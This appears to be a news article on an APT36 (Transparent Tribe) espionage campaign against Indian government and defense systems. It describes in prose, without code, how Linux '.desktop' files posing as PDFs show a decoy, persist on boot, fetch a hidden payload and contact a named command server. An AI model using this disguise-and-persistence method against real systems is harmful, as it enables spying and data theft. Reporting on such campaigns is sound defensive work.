Fake PDF files hide dangerous malware

A hacker group called Transparent Tribe, also known as APT36, is running a new cyber attack against India. The group is believed to be linked to Pakistan.

This time, they are using a special type of file called a “.desktop” file. Normally, these files are harmless shortcuts in Linux computers. But in this attack, the file pretends to be a safe PDF document.

The hackers sent a fake file named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”. When someone opens it, the file shows a normal PDF in the web browser so the victim thinks everything is fine. At the same time, it secretly installs malware in the background.

The fake file is carefully made to trick people. It has a PDF icon, runs like an app, and even sets itself to start automatically whenever the computer is turned on. Once active, it downloads more hidden code from the internet, decodes it, and runs it without showing anything to the user.

Malware built for spying and stealing information

The malware is much more advanced than a normal virus. Experts found it is a special program built for Linux computers. It is a 64-bit executable, which means it can work on modern systems.

Once it runs, the malware connects to a secret server called “modgovindia[.]space:4000.” This server is the control room for the hackers. It lets them send commands and receive stolen data.

How Cyber Attacks on Industrial Control Systems Can Endanger Lives ?

The malware uses clever tricks to stay hidden. It talks to the server using methods that are harder to detect than normal internet traffic. It also sets up automatic tasks on the computer, so it restarts itself every time the system is rebooted.

With this setup, the hackers can stay inside the computer for a long time without being noticed. They can steal files, monitor the system, and keep spying on the victim. The main targets of this attack are Indian government and defense systems.

Transparent Tribe’s record of cyber attacks

APT36 is not new to such attacks. The group has been active since at least 2013. Over the years, it has attacked people and organizations in at least 27 countries, including India, Afghanistan, Germany, Iran, and Pakistan.

The group became more visible in 2016 when researchers found it targeting Indian diplomats and military staff. Back then, it used fake emails and infected websites to trick people into downloading spying tools. Two of its custom tools, called Crimson and Peppy, were able to steal data, take screenshots, and even record from webcams.

Insider revenge cyberattack freezes 1,000 workers — Eaton hit with massive disruption and losses

Since then, APT36 has expanded its attacks beyond government and defense. It has also targeted universities, research groups, civil society groups, and diplomatic offices abroad.

Experts say the group often changes its methods. In the past, it focused more on Windows systems and mobile devices. Now, by using Linux “.desktop” files, it is clearly trying to attack systems used in Indian government offices more effectively.

The discovery made on August 1, 2025, shows that this campaign is still active. The hackers are sending out fake files that look like normal documents, but are actually dangerous traps. This makes the attack hard to spot, and very effective for spying.